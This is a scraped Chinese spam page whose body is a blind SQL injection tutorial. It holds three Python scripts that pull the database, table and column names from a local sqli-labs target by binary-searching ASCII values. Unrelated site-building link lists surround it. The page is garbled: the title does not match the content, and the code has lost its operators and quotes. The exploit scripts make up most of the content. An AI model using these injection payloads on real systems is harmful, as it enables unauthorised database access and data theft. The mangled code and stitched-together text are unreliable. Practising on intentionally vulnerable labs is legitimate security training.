当前位置: 首页 > news >正文

网站备案的好处卖东西的小程序是怎么弄的

网站备案的好处,卖东西的小程序是怎么弄的,大学做视频网站设计,网站内容建设整改工作?id1 and sleep(2)-- 发现页面存在注点#xff0c;使用时间盲注脚本进行注入--- import requestsdef inject_database(url):name #name用于存储猜测出的数据库名称 for i in range(1, 20): # 假设数据库名称长度不超过20low 48 # 0high 122 # zmiddle (low high…?id1 and sleep(2)-- 发现页面存在注点使用时间盲注脚本进行注入--- import requestsdef inject_database(url):name #name用于存储猜测出的数据库名称 for i in range(1, 20): # 假设数据库名称长度不超过20low 48 # 0high 122 # zmiddle (low high) // 2 /*low, high, middle 用于二分查找(内层循环使用二分查找法猜测每个字符的ASCII值)*/while low high:#构造Payload: payload是SQL注入的有效载荷,尝试猜测当前字符的ASCII值payload 1 and ascii(substr(database(),%d,1))%d-- % (i, middle)params {id: payload}r requests.get(url, paramsparams) # 判断注入是否成功依据靶场的返回信息if You are in in r.text: # 只检查包含 You are in 的内容表示成功low middle 1else:high middlemiddle (low high) // 2 # 只拼接有效字符跳过空格ASCII 32和其他非打印字符if middle 32: # 跳过空格和不可打印字符name chr(middle)print(fCurrent database name: {name})low 48high 122middle (low high) // 2print(fFinal database name: {name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.phpinject_database(url) 用一个布尔盲注攻击从数据库中提取表名 -循环遍历表名的每个字符 -二分查找法通过ASCII码范围48到122进行二分查找确定每个字符的值 -构造SQL注入Payload利用substr函数和ascii函数逐字符比较表名的ASCII值 -发送请求并判断结果 -跳过空格和非打印字符只拼接有效的字符 import requestsdef inject_table_name(url, database_name):table_name for i in range(1, 20): low 48 # 0high 122 # zmiddle (low high) // 2while low high:# payloadpayload f1 and ascii(substr((select table_name from information_schema.tables where table_schema{database_name} limit 0,1),{i},1)){middle}-- params {id: payload}r requests.get(url, paramsparams)if You are in in r.text: low middle 1else:high middlemiddle (low high) // 2if middle 32: # 跳过空格和不可打印字符table_name chr(middle)print(table_name)low 48high 122middle (low high) // 2print(fFinal table name: {table_name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.php database_name security # 目标数据库名称inject_table_name(url, database_name) 通过payload猜测数据库表的列名 import requestsdef inject_column_name(url, database_name, table_name):column_name for i in range(1, 20): low 48 # 0high 122 # zmiddle (low high) // 2while low high:payload f1 and ascii(substr((select column_name from information_schema.columns where table_schema{database_name} and table_name{table_name} limit 0,1),{i},1)){middle}-- params {id: payload}r requests.get(url, paramsparams)if You are in in r.text: low middle 1else:high middlemiddle (low high) // 2if middle 32: column_name chr(middle)print(column_name)low 48high 122middle (low high) // 2print(fFinal column name: {column_name})if __name__ __main__:url http://127.0.0.1/sqlilabs7/Less-8/index.php database_name security table_name users # 目标表名inject_column_name(url, database_name, table_name)
http://www.dnsts.com.cn/news/46770.html

相关文章:

  • 合肥房产网站建设平面设计新手兼职接单
  • le网站源码建设集团网站公司
  • 如何查看网站的空间企业crm客户管理系统
  • 谷歌优化网站链接怎么做深圳网站建设app开发
  • c h5网站开发wordpress 简约博客
  • 镇江网站优化哪家好建设厅网站贵州人事考试信息网
  • 个人网站有前途吗忘记密码wordpress
  • 网站建设ssc源码修复全国免费分类信息发布平台
  • 潍坊网站排名网站建设费要交印花税吗
  • 做什么网站吸引人南通门户网站
  • 工商网站查询企业信息武威网页设计代码爱心
  • 平度做网站公司我的网站突然打不开了
  • 做网站要多少费用一键生成app制作器
  • 电商专业就业前景深圳推广软件十年乐云seo
  • 同城配送网站建设wordpress同步qq微博
  • 网站服务公司人工成本进什么费用学校网站建设问卷调查表
  • 番禺怎样优化网站建设学网站建设的学校
  • 南阳做网站的深圳找工作哪个网站好
  • 海外建站推广企业网站建设对企业客户的意义
  • 深圳市国外网站建设网站开发的收获体会
  • 科技有限公司可以做网站建设吗?网站个别页面做seo
  • 网站建设电商考试wordpress商城模板好用吗
  • 什么网站下载素材做图的wordpress 301插件
  • 沈阳高端网站郑州网络营销公司有哪些
  • 建设网站如何收费网站研发公司
  • dede 网站地图模版长春模板建站公司
  • 高端品牌网站建设兴田德润在哪儿代理登录网站
  • 哈尔滨做网站的价格企业网站建设2017
  • 西安网站公司哪家好创建微信公众号平台
  • 网站开发软件科技公司郑州网站建设大华伟业